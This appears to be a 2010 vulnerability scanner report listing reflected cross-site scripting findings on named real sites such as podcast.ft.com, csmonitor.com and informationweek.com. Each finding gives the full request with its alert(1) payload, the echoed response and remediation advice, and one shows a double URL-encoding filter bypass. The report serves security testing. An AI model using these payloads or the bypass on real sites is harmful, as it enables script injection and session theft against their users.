This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /columnsf1055%253cscript%253ealert%25281%2529%253c%252fscript%253ee5e225c0fd4/article.asp HTTP/1.1 Host: mcpmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Sat, 11 Dec 2010 02:17:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=fivbhwifiarrp545p3zkrh55; path=/; HttpOnly Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 57514 Set-Cookie: BIGipServerPool-mcp-80=167971082.20480.0000; path=/ Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6a1a0%253cscript%253ealert%25281%2529%253c%252fscript%253e8c5887176a1 was submitted in the REST URL parameter 2. This input was echoed as 6a1a0<script>alert(1)</script>8c5887176a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /columns/article.asp6a1a0%253cscript%253ealert%25281%2529%253c%252fscript%253e8c5887176a1 HTTP/1.1 Host: mcpmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Sat, 11 Dec 2010 02:17:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=jrpctu3codxumcyau5h1zx55; path=/; HttpOnly Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 57514 Set-Cookie: BIGipServerPool-mcp-80=167971082.20480.0000; path=/ Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <span id="ctl00_ContentPlaceHolder_ctl01_lblError" class="error">http://mcpmag.com/columns/article.asp6a1a0<script>alert(1)</script>8c5887176a1 not found</span> ...[SNIP]...
1.25. http://mcpmag.com/columns/article.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mcpmag.com
Path:
/columns/article.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 80198<script>alert(1)</script>97468173ffd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /columns/article.asp?80198<script>alert(1)</script>97468173ffd=1 HTTP/1.1 Host: mcpmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Sat, 11 Dec 2010 02:17:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=5scz2z5502y0svmd1j31xpiu; path=/; HttpOnly Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 57516 Set-Cookie: BIGipServerPool-mcp-80=167971082.20480.0000; path=/ Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <span id="ctl00_ContentPlaceHolder_ctl01_lblError" class="error">http://mcpmag.com/columns/article.asp?80198<script>alert(1)</script>97468173ffd=1 not found</span> ...[SNIP]...
1.26. http://podcast.ft.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://podcast.ft.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb08b"><script>alert(1)</script>52d144f10a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php/cb08b"><script>alert(1)</script>52d144f10a4 HTTP/1.1 Host: podcast.ft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:19:55 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 Set-Cookie: PHPSESSID=2lq2ektrfuamk9cqu4r3gpuoi1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 89975
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Podcast and audio downl ...[SNIP]... <a href='javascript:void(0)' title='Link to audio' onclick="showLink('podcast.ft.com/index.php/cb08b"><script>alert(1)</script>52d144f10a4','1008','share_1008');"> ...[SNIP]...
1.27. http://podcast.ft.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://podcast.ft.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5257b'><script>alert(1)</script>12d6378f5ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php/5257b'><script>alert(1)</script>12d6378f5ff HTTP/1.1 Host: podcast.ft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:19:59 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 Set-Cookie: PHPSESSID=2du57i69fa2me9h6bghal34323; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 89975
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Podcast and audio downl ...[SNIP]... <a href='/index.php/5257b'><script>alert(1)</script>12d6378f5ff?sid=47' border='0' title="FT Arts podcast"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5165a"-alert(1)-"ee6c016d114 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /20075165a"-alert(1)-"ee6c016d114/0806/p13s01-wmgn.html HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Sat, 11 Dec 2010 02:18:34 GMT Served-by: Content-Language: en-US Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 11 Dec 2010 02:18:34 GMT Date: Sat, 11 Dec 2010 02:18:34 GMT Content-Length: 17196 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--seo title-->
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d5c5"-alert(1)-"af03f3362d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2007/08063d5c5"-alert(1)-"af03f3362d0/p13s01-wmgn.html HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Sat, 11 Dec 2010 02:18:38 GMT Served-by: Content-Language: en-US Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 11 Dec 2010 02:18:39 GMT Date: Sat, 11 Dec 2010 02:18:39 GMT Content-Length: 17196 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--seo title-->
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7886"-alert(1)-"fab3f1bc409 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2007/0806/p13s01-wmgn.htmlb7886"-alert(1)-"fab3f1bc409 HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Sat, 11 Dec 2010 02:18:44 GMT Served-by: Content-Language: en-US Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate Expires: Sat, 11 Dec 2010 02:18:44 GMT Date: Sat, 11 Dec 2010 02:18:44 GMT Content-Length: 17196 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--seo title-->
var s_code=s.t();if(s_code)document.write(s_code); </script> ...[SNIP]...
1.31. http://www.csmonitor.com/2007/0806/p13s01-wmgn.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csmonitor.com
Path:
/2007/0806/p13s01-wmgn.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26e89"-alert(1)-"d9746f262e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2007/0806/p13s01-wmgn.html?26e89"-alert(1)-"d9746f262e0=1 HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.12 (Ubuntu) Content-Length: 51204 Content-Type: text/html; charset=utf-8 X-Powered-By: eZ Publish Content-Language: en-US Served-by: Pragma: no-cache Cache-Control: max-age=86382 Expires: Sun, 12 Dec 2010 02:18:12 GMT Date: Sat, 11 Dec 2010 02:18:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--seo title-->
var s_code=s.t();if(s_code)document.write(s_code); </script> ...[SNIP]...
1.32. http://www.e-health-insider.com/news/2967/most_internet_pharmacies_unregulated [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.e-health-insider.com
Path:
/news/2967/most_internet_pharmacies_unregulated
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6ec6"><script>alert(1)</script>90c46f75143 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/2967/most_internet_pharmacies_unregulated?c6ec6"><script>alert(1)</script>90c46f75143=1 HTTP/1.1 Host: www.e-health-insider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 11 Dec 2010 02:17:15 GMT Server: Microsoft-IIS/6.0 Set-Cookie: CFID=13140244;expires=Mon, 03-Dec-2040 02:17:15 GMT;path=/ Set-Cookie: CFTOKEN=40869724;expires=Mon, 03-Dec-2040 02:17:15 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <a href="/login.cfm?r=/404.cfm?404;http://www.e-health-insider.com:80/news/2967/most_internet_pharmacies_unregulated?c6ec6"><script>alert(1)</script>90c46f75143=1"> ...[SNIP]...
1.33. http://www.ecommerce-journal.com/news/24293_phishing-does-not-fade-financial-brands-most-exploited-junk-mails [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 514c9"><script>alert(1)</script>9e9311ab829 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/24293_phishing-does-not-fade-financial-brands-most-exploited-junk-mails?514c9"><script>alert(1)</script>9e9311ab829=1 HTTP/1.1 Host: www.ecommerce-journal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><head> <title>Phishing does not fade, with financial brands as most exploited in junk mails | Ecommerce Journa ...[SNIP]... <a style="color: #ffffff;text-decoration: underline;" href="http://m.ecommerce-journal.com/news/24293_phishing-does-not-fade-financial-brands-most-exploited-junk-mails?514c9"><script>alert(1)</script>9e9311ab829=1"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e70ce"><script>alert(1)</script>e2046199a2 was submitted in the REST URL parameter 3. This input was echoed as e70ce\"><script>alert(1)</script>e2046199a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/domaner/villkore70ce"><script>alert(1)</script>e2046199a2 HTTP/1.1 Host: www.iis.se Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:35 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g X-Powered-By: W3 Total Cache/0.9.1.3 Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.iis.se X-Pingback: http://www.iis.se/wordpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:15:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14580
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv" lang="sv"> <head>
1.35. http://www.iis.se/en/domaner/villkor [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.iis.se
Path:
/en/domaner/villkor
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a9cd"><script>alert(1)</script>ca25a72b85c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a9cd\"><script>alert(1)</script>ca25a72b85c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/domaner/villkor?3a9cd"><script>alert(1)</script>ca25a72b85c=1 HTTP/1.1 Host: www.iis.se Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:15:30 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g X-Powered-By: W3 Total Cache/0.9.1.3 Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.iis.se X-Pingback: http://www.iis.se/wordpress/xmlrpc.php Cache-Control: max-age=900 Expires: Sat, 11 Dec 2010 02:30:30 GMT Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv" lang="sv"> <head>
1.36. http://www.independent.co.uk/life-style/fashion/features/boomtime-for-fashion-fakers-1700875.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 242c0"><script>alert(1)</script>9ed7ac74b10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /life-style/fashion/features/boomtime-for-fashion-fakers-1700875.html?242c0"><script>alert(1)</script>9ed7ac74b10=1 HTTP/1.1 Host: www.independent.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:15:36 GMT Content-Type: text/html;charset=ISO-8859-1 Set-Cookie: JSESSIONID=300D0E5F1D8C04FD04045EF8B769E9F6; Path=/independentLondon Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 115193
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8acb3'-alert(1)-'e3539ed0cd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news8acb3'-alert(1)-'e3539ed0cd7/internet/policy/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:25 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:25 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=5SE0P13N3VALJQE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32779
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Policy_Welcome_Ad_1x1;key=/news8acb3'-alert(1)-'e3539ed0cd7/internet/policy/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=646040761;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70e74"><script>alert(1)</script>47b0c19c156 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news70e74"><script>alert(1)</script>47b0c19c156/internet/policy/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:23 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:23 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=BWXLDIFVKVJJFQE1GHPCKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32829
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Policy_Welcome_Ad_1x1;key=/news70e74"><script>alert(1)</script>47b0c19c156/internet/p;kvarticleid=;kvauthor=;loc=300;grp=146444314" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4680b"><script>alert(1)</script>c0059b9b4ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet4680b"><script>alert(1)</script>c0059b9b4ab/policy/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:26 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:26 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=CXNOW3L2131FVQE1GHPCKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32182
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/internet4680b"><script>alert(1)</script>c0059b9b4ab/p;kvarticleid=;kvauthor=;loc=300;grp=69909228" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23f98'-alert(1)-'fad295cde08 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet23f98'-alert(1)-'fad295cde08/policy/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:27 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:27 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=2KKREGN1FRSFFQE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32144
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/internet23f98'-alert(1)-'fad295cde08/policy/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=162583866;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e9ab'-alert(1)-'228dc317a35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/policy7e9ab'-alert(1)-'228dc317a35/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:36 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:36 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=IJHIXFHBIOYVXQE1GHPCKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32755
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... t language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Policy_Welcome_Ad_1x1;key=/news/internet/policy7e9ab'-alert(1)-'228dc317a35/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=354053953;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa3f5"><a%20b%3dc>a23bc44272e was submitted in the REST URL parameter 3. This input was echoed as aa3f5"><a b=c>a23bc44272e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/internet/policyaa3f5"><a%20b%3dc>a23bc44272e/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
